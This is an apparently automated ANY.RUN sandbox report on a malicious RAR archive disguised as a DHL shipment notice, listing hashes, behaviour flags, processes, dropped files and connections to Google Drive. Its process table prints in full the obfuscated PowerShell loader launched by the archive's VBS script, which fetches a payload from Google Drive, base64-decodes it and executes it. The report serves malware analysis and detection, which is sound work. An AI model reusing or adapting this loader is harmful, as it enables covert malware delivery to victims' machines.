analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DHL0000879654982647865424.rar

Full analysis: https://app.any.run/tasks/dbb59ab7-28ab-47a2-a43b-19f9f9346b17
Verdict: Malicious activity
Analysis date: May 02, 2024, 11:52:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CEF629C973F39CF009E88AD2CD44B071

SHA1:

22475D2C0FF5275D9894B366D1311DC2F90A3C93

SHA256:

CD53A6FE8110C7E639956A0F66877CC766969EB75F1DDAD7B66B5B2804AD13C3

SSDEEP:

384:7Y/JsCr+LypPOWl3vQarV+0M2pDJF0C1S3Jl:7Y/yCr+LypPOWtm2dLEJl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 4016)
  • SUSPICIOUS

    • The process executes VB scripts

      • WinRAR.exe (PID: 3976)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3976)
    • Suspicious use of symmetric encryption in PowerShell

      • wscript.exe (PID: 4016)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 4016)
    • Reads the Internet Settings

      • wscript.exe (PID: 4016)
      • powershell.exe (PID: 4084)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 4016)
    • Get information on the list of running processes

      • wscript.exe (PID: 4016)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4016)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 4084)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4084)
    • Unusual connection from system programs

      • powershell.exe (PID: 4084)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4084)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 4016)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4084)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4084)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4084)
    • Reads the computer name

      • wmpnscfg.exe (PID: 1432)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 1432)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4084)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1432)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe powershell.exe cmd.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3976"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\DHL0000879654982647865424.rarC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4016"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3976.9795\DHL0000879654982647865424.vbs" C:\Windows\System32\wscript.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
4084"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sammenstyrtningsfarerne = 1;$Trochoides='S';$Trochoides+='ubstrin';$Trochoides+='g';Function Delikatessehandelen($Dimissorernes){$Afholdsbevgelsen=$Dimissorernes.Length-$Sammenstyrtningsfarerne;For($Pladsreservationernes8=5; $Pladsreservationernes8 -lt $Afholdsbevgelsen; $Pladsreservationernes8+=(6)){$Sammenfjningssteders+=$Dimissorernes.$Trochoides.Invoke($Pladsreservationernes8, $Sammenstyrtningsfarerne);}$Sammenfjningssteders;}function Overelegancy($Ungarbejdernes){& ($Radixers) ($Ungarbejdernes);}$Conversible16=Delikatessehandelen 'StoraMyashmoPredazCin hiTube,lVit rlLossea Taln/Gylde5Tidsa.Strej0Charl Forfr(InkviW BetoiB,hagnRi.efdBefrioBourgwUnemps,ncub UprouNGermaT etai copal1S.ren0Diluv.Witch0Hypok;Van,m Cam,W Watai DomknAdm n6 Must4Luter; Myos Cystex Dr.s6Tenan4 Rick; Uroh Phlorrant,kvMethe:,ilie1F.ash2Campl1kickb.So.fo0Blokn) Ti.s AbomGMet.seBlephcWhitnk Cel oK sta/Rulle2 Tils0Conse1Beeli0Forsk0Theop1 Unpl0R boa1Tils Has FStrmpiTjattrSiegeeKosmefhos,ioRecomxUrop./m.nds1reacc2Mande1B ach. Folk0 xid ';$Umiac=Delikatessehandelen ' ubmaU semisSo.neeStiftrBankg-c.louATopngg CouneLowbrnSundhtMole ';$Forbearantly=Delikatessehandelen 'TotakhUnd mtH.rhet Pl tpVrelssRedef:Afdel/Ha ga/ves ad,alenrSed.siHypokv ,toeeElsd,.,enobgEsplao,oudaoPrintgFrontl ptage Styr.vink.cForhjo.ndermEkspo/ ,ugguBrug.cNedsa?TranseAnskuxunrefpFinano KrybrF.kketCarec=Roun.dSakrao OboewTrs ln Bud.lVenomoProsaaStnkedAffed& K mpi BracdI.por= S.ke1Trst PUnsanULivetCGevan0ReproHVrangEAutomQXylonCMewedmInterq seleI CopreoverrZAbstrgCorneURetshsOnrusY A goG.ende6Blust-s,atlGSlyngcForekd Bru.SA efePBeredzHemisU For,J ,ennD brneuSkattzSk peaCitys ';$Franky=Delikatessehandelen ' unds>Bereg ';$Radixers=Delikatessehandelen 'Chy.ii PaurePa flx Grot ';$Boyishnesses='Raadnes';Overelegancy (Delikatessehandelen 'BeregS UnpreFiltrtInspi-BiofyCLageroEkspon Pol.tMer eePu chnHjlp t Hjor B.nei-T,ediPMenstaS baltstrafhAcro BrndeTOver :Svveb\dowseCDia.aySlgert ucuoH.mocmC,lebi fi itEvoleoT rismUmulieTavse. W tet U sux NonstMinim Spar,-TilstVNodosa MesslSwingu C ryeTiema I,fra$PiccoBCrea,o,aleryVankuiAvls,sEn rehHemosnudspreRas,rs,nconsBevikeSelvms.darv;Party ');Overelegancy (Delikatessehandelen ' ediiPotenfSusta Gemm( Tidlt D.skePa.tisKrse tTeori-IgnorpInterabesgstLandkh Herb NongrT Mu,t:Vi.ot\ malkCForu,yPrefrtOparboAlienmMarchideocctChelaoCyclomInexpeOmsk,.Tilfrt .lluxb,okat Uege)zooph{ FamieUnbioxSk,gbiklagetKomma} Indi;P,cin ');$Unconcealment = Delikatessehandelen 'ToforeSn.esc,araohDan.ioCasem M,nos%In.oma Mi.ipKrs epLokald Busla Polyt Ny.taPrten% Mali\abrupC Can hIrreceProdifElhegiSverinTetrag,utikeIncannProgri SemirVio.eeYngstnA.oros Tomm.Ska,lROveruiFor,udStrop Nerve&Sygdo&Aandr PointeUdnvncProgrhIndicoAfsko Afric$Trame ';Overelegancy (Delikatessehandelen 'Aster$BenaagDis,nl KommoGrundbIrrigaS erglAbort:WondeEFyraalAfskeeKera kC.rbotFipskr Steno GraaiLovl,nQuadegMinice Unden UncoiS.eserColousPogon=Unatt(.lycecFuglemthistdFormn De.in/S cilcKunde .arde$begreUSynonn SkrlcForesoKnfrin ShaccPrinteDobbea CharlFonogm HjemeFeatnnRanunt ist)Spott ');Overelegancy (Delikatessehandelen 'Phall$BeliggS.bvel,lirtoFstnibUdtydaIntell In,t:.ecitKUmbraaUnexam ApprrIntereBooni=B,gsm$B.sebFn duloMisilrRubatbVaretePhenoaPhytorUns,aaPietenFumertbari lS,ilnyvarvi.Gru.ps,otulpSplenlMorphiinfi tKiz.l(Lashl$ DetdFUna rrCommaaPre.enTa takSnowbyAabni)pulse ');$Forbearantly=$Kamre[0];Overelegancy (Delikatessehandelen 'Senla$DichagCon.olsurmuoSkemabDomi askov.l,rowa:C tapG MennasymptlGraa.etronfrDusini Relit Gi,tedemok6.utoi2Compu=Som,lNCompleHj.psw Fias- AnelO Addlb H.lvjFakkeeStatic Uomgt F,jt Pl.xSKapity TvebsaspirtParileStonymM.ett. ForsNAnticeTurbotTepos.WaldbWRatakeOrt.obSprg,CStvbrlHar.ii ,nbletcst.nSmurttPi.ch ');Overelegancy (Delikatessehandelen ' Gnav$L.sedGIndera Rapsl.egateKaramr StofiFusiotFordyeBlykl6.raje2Hexes. SaltHin ppe BlomaUdkogd gisseSnu,nr ParqsPrisg[P lym$IchthUCdromm.ncaniRekonaHwandcSeleu]gi,sd=sis a$C.eapCSk.ttoSubscnQuichvAndabe WickrTraves.odsti Vigeb Tusil,tageeGgebl1 Ve,a6venne ');$Noneconomies=Delikatessehandelen 'Slad G Rawla nrelAang eH.mlerTelegiAnabatRoumeeSulfo6Spa.r2Hjoe..AddysDEbu ioNonphwFilejnS.atslPhutpogestaascybadImproFMartiiamforloverpeTookl(Noncr$Foed.FA.peloTeethrPr,knb Maxieberedainfanr faina orhnBrusettermilV,viayF.owa,Berke$ KvikIHyperrHerb.i llocC.arti Pr.nzLithoe Unpi)Samm, ';$Noneconomies=$Elektroingenirs[1]+$Noneconomies;$Iricize=$Elektroingenirs[0];Overelegancy (Delikatessehandelen 'Ruski$SprdegF licl VamsoMyndibAfbana Des.lSiaod: Frugp St.tiAnd.raT resnOpblanRab.taDk,ins Stem=Slutn( TriaTRaze e Fra,sEj,cotI,fin-stormPJulemaga.ritNummehRa,bi Spor $PolemI BasirIlle,iK,arec Beadiki.elzCourbeCh,nc) ,red ');while (!$piannas) {Overelegancy (Delikatessehandelen ',esis$ reragNonpolafsp oBil ibportfaBagerlThun,:SlgerPKamufnAdoptiClaudtEvalueSprunn,emyssSubseeEs,ad=A,tis$Eso rturtepr ,kovuGladseRveha ') ;Overelegancy $Noneconomies;Overelegancy (Delikatessehandelen 'AcuerSForn t,dsela No sr Deklt.rady-RekorSDehealRednieAustreBa.dypEtaar Mekan4Teros ');Overelegancy (Delikatessehandelen 'conte$Danmage,stalEksamoFolkebzeelaaTumbll Om.t:Faldgp Tr,kiOverdaRekv,nUeften Mi la non,slives=.ndic(B,rbaTCapere Si.es .iegtAkr.m-IllusPDelatabonditReg ehDuode Flle$CountIExclurLotaniS.lvbcoutpuiAfs vzSaeumeAmelu)Garni ') ;Overelegancy (Delikatessehandelen 'Pharm$.uperg FlamlAg,etoSunlibPrejua Udbal ndus:BondiADrabse OculrBnke.a Inver FjoriPatrouVeninmChron=Reima$ at.agcloc,l DeckoRemodbRennyaStj.rlTerro:CatnaBVeteraUnderaErican ButcdFoldevBotanvUnda +Sp,te+Un av%Conce$HundrKMrkekaSollymRepenr.smoseLrerk.Prot cpallao SpoluHidfrnBllertMinoi ') ;$Forbearantly=$Kamre[$Aerarium];}Overelegancy (Delikatessehandelen 'Dobbe$OpteggTroldlPaladoAgalrbTvrstaB,ondlRveja:OrienNP,anteSolisdAlumit Eftea AbrolI,scrt asaeAswir Fross=Vapor Vrk tGWilgaeKataptOr,it-FarsoCSemicoVrdi,nMacrotOkkupe.arbwn Typ tKon,l R par$rude.IUnenvrManusiA,tidcRenteiSmigrzHjreveTermi ');Overelegancy (Delikatessehandelen 'Semi.$,raucgRunarlLohanoCoa.vbTlleta.vninlSvejs:Unc.eABuddhgApozenPechteunbuctSy.thhHepa.aVault1Snowm1Fagde1C,oth Mgets= .ver Damno[ MonoSVar eyDromosGuntatU derePredim Mona.NonliCSuperoCrabmnOiksivinappeAfterr MakstJacks]Rrlag:Kirk,:S.orbF ChilrRehanoNoncom AfstBMonocaDoorksDiskreudtry6,tadi4SrnumS O,ertPoblar SkoliRetronHetergUpper(Pixie$mycanNSkrupeEkspodTranstTokroa,usselUnd.ptEparte Copi)Blafr ');Overelegancy (Delikatessehandelen '.larm$CouragsproglUnderokromobVejmaaW,bstlArche:E,osiPBe.orrLstssoPto,apThorbuRivnilRigsosPhysoaHeptatCrie oVa,egr.porty Ital Come=Sprog Quiti[.lagiSAf.pay.aalssSarantSpec.eSteinmoplys.Reap TTermoe SimpxSmre,t Paro.Pro rEDiskenRigsrcFamiloSp.sedRake iAntagn Ald,g,eybo].dole:Abstr:TelesA buffSSermoCUmuliI oteIReuph.EksplGMalmheProdutStandSTuppetForberUnderiVenstnMini.gTrane(S,lic$KransAAbbedgTonsin Ne teR ceat Hoveh .imbaFloto1Ba.dp1Wonde1P.ppe)Fusi. ');Overelegancy (Delikatessehandelen ' Spro$EgenpgEcuadl alamoPrintbTanguaB,oholmon.m:ForesS dansfD.yeri elvsnSadlek Nonss Ed,eaafskrgSousatOr.hoipell,gAgagrtReane=downg$ThyrePburglrToxifo helipDecenu ChrilAdmins BridaAl.hatAlogio.alycrAccelyJugge.Pyrr.sTrtt,uSalgsb NonbsSystetunavor verdiSlalon So egToolm(S per3 Frdi3Nigre0 r dn7 Trke4Teleo4 Up.e,Eve y2 ctio8Indu 5Flims0Nont.6.tebb),utik ');Overelegancy $Sfinksagtigt;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2028"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Chefingenirens.Rid && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1432"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
14 432
Read events
14 357
Write events
63
Delete events
12

Modification events

(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3976) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\DHL0000879654982647865424.rar
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
6
Text files
3
Unknown types
2

Dropped files

PID
Process
Filename
Type
4084powershell.exeC:\Users\admin\AppData\Roaming\Chefingenirens.Ridhtml
MD5:650EF7C6910EAA1A47C85B5708A99EC8
SHA256:13E5E88D5267B0253FE3F756F8911632ACC1C9E47E9A57AA5745DB4FE4E696A3
4016wscript.exeC:\Users\admin\AppData\Local\Temp\Cab5381.tmpcompressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
4084powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
4016wscript.exeC:\Users\admin\AppData\Local\Temp\Tar5382.tmpbinary
MD5:435A9AC180383F9FA094131B173A2F7B
SHA256:67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
4016wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
3976WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3976.9795\DHL0000879654982647865424.vbstext
MD5:F95C567AF6DCCB9CE866FE0144515EBF
SHA256:41081D12FABF3F0CE2198B3B11B70AF6F2A0483A61D02B6243D1B2AAE59448FB
4084powershell.exeC:\Users\admin\AppData\Local\Temp\1ueucl5k.fo0.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
4084powershell.exeC:\Users\admin\AppData\Local\Temp\snxrvd1m.jaj.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
4016wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:9B5058A3EDBE772A0DC8D462ACC0BB6D
SHA256:9197D67B808763B18ADE099C468E6168874449D008095BAFC23FFA79A65390AA
3976WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3976.13584\DHL0000879654982647865424.vbstext
MD5:F95C567AF6DCCB9CE866FE0144515EBF
SHA256:41081D12FABF3F0CE2198B3B11B70AF6F2A0483A61D02B6243D1B2AAE59448FB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
7
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4016
wscript.exe
GET
200
184.51.252.177:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee8e7929c6b4ef0e
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
4016
wscript.exe
184.51.252.177:80
ctldl.windowsupdate.com
Akamai International B.V.
SE
unknown
4084
powershell.exe
142.250.185.110:443
drive.google.com
GOOGLE
US
whitelisted
4084
powershell.exe
142.250.184.193:443
drive.usercontent.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 184.51.252.177
  • 184.51.252.183
  • 184.51.252.188
  • 184.51.252.186
  • 184.51.252.172
  • 184.51.252.190
  • 184.51.252.174
  • 184.51.252.185
  • 184.51.252.175
whitelisted
drive.google.com
  • 142.250.185.110
shared
drive.usercontent.google.com
  • 142.250.184.193
unknown

Threats

No threats detected
No debug info